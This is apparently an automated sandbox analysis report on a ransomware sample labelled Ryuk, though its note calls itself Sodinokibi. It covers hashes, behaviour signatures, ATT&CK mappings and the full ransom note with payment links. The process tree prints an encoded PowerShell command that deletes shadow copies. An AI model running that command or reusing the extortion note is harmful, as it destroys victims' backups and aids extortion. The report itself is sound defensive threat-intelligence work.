Analysis

  • max time kernel
    121s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 08:03

General

  • Target

    0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe

  • Size

    166KB

  • MD5

    e95162f6cffa1a72a495a8edc11ee51b

  • SHA1

    ecea28ecbcb64cadccc161e7e864c516f7b96523

  • SHA256

    0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de

  • SHA512

    65b5f90c9f0f9bdee323554cbc1d5d2869268af8e181e75a6d872e396537ad3b4021635a8d0236e89c3b81f00c502931fd884e49c9283bccc1a6c82426bcc440

Score
10/10

Malware Config

Extracted

Path

C:\l7xpj88j0-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension l7xpj88j0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3EA993C1B088917 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A3EA993C1B088917 Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: cKCC6B+QXbYRrERq7SxTRVbB34PZtD1tXzjmZpQ8igZEBpa7HYbud2OeRQK5Zmek ApArqIrlG4ptGIKWXicwWbSiyTFnQYeZFOynRwP3p7jZlPaoGZawTRDR7dQPfW5m brUHbteY2JfExgdl2r1bxUgDgEpXnUpcnnbgFFw58JGDB0u/r1YTZR4zAhI65tUb 39g5/arxJ2YJB31KeboIBsa2ObWcBcikYToGSCMoP1FQZVjby4jmM84mynTpPyLC BshNHOV81xNs1IjZB1vOEukNN2u8XTB4+pFrwa1ue3dsEGjFik99PxtNCFV6OG+R ttDODzZJuNwZyZSf6ctEvrID2+6jAvqa+Z2A0sML04bK2jf2yKhrrr9fdejPAK5p kzNduyHnEU7WBkyVlHhccI2l1M1XT0zH26xLOl9DJ8Tk1SITt59bNIIqQPfD/RLw 1xP7ONdPyTRygC4FVpLiaFJLrE36aL5CSK2u4vDHtovdJ9caByGcP20b2XPdPx97 CE+Rj7DGBQ3f/S5Mhkh/pNPJqtbhNS6VDrrDsxw5Iao8aA4WTCESAjXUk6Ag/oHs okgkOrzNF0tI+uJ7n/n1Yi7ytpn12nfTzYhrfMpwfIxWU7gAF/ZTyhiR6flV8Lun hWMnSDfOHrunJh5lpeLq8Wzrkfvx25W9rXEt1bicbrArBPYFdoCSohT9D1w1grF1 RGRpXgmSoykvj8JgS68KSPYZMVQj7KtHv+6SupmLGI2jGJjt7rD5FblM8+NQUKNe mi13e36Mt6++z/z8mf0N8OYZ0lt/Sr3nT+PRjAhoTPi1PHZ6X7/zh48uIustjt+f f990+LrHAN8N+9+LCDTS8Nhffql9W21ysCUMdB+TPKiO5BopS3Ps0vsaWiBmF/Y8 y+E5URfIS3lK+pivPTMM9qO3uwsmSzM/nqts66MWz1+0/hc8sCQSlAoqTOSVKkKC tidO/F0P9DrgONGHiq/YR5SLZDZQwpcbZkZcvcaaXEz9FklOBOSZidPUnvkiHtZ5 ofKg3W1H33KP7hu37nz6Lm1j7q3ZQ4MwwBNsZvzbKK4OaKhCba/ZIhi99tZ8Ay0u qf11F7jMp1DBdjGSLOxy9P73PW5S7fgvWv38Q5/yYSXcxWB0rZ3ZyQk/NiboW7go k3KlnuRGgnA70EXH2DeuaZaSutEKjnThmiSVMxobwCn713p83AjhNTxb7R3lNYyb b0EDxXkLLUPgwB9QzBMVyoOkdAk/DKYUaGz6Ba+6Ovy0kHEKXRVeSX8bdtUsT0j2 2bzD3VZJTcbaVMm2lC0z76MsU0p+ucnMSop6fQC0 Extension name: l7xpj88j0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3EA993C1B088917

http://decryptor.cc/A3EA993C1B088917

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe
    "C:\Users\Admin\AppData\Local\Temp\0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1696
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1220
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1452

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1696-55-0x000007FEFB771000-0x000007FEFB773000-memory.dmp
      Filesize

      8KB

    • memory/1696-58-0x0000000002794000-0x0000000002797000-memory.dmp
      Filesize

      12KB

    • memory/1696-56-0x0000000002790000-0x0000000002792000-memory.dmp
      Filesize

      8KB

    • memory/1696-59-0x0000000002792000-0x0000000002794000-memory.dmp
      Filesize

      8KB

    • memory/1696-57-0x000007FEF29D0000-0x000007FEF352D000-memory.dmp
      Filesize

      11.4MB

    • memory/1696-60-0x000000000279B000-0x00000000027BA000-memory.dmp
      Filesize

      124KB

    • memory/1720-54-0x0000000075601000-0x0000000075603000-memory.dmp
      Filesize

      8KB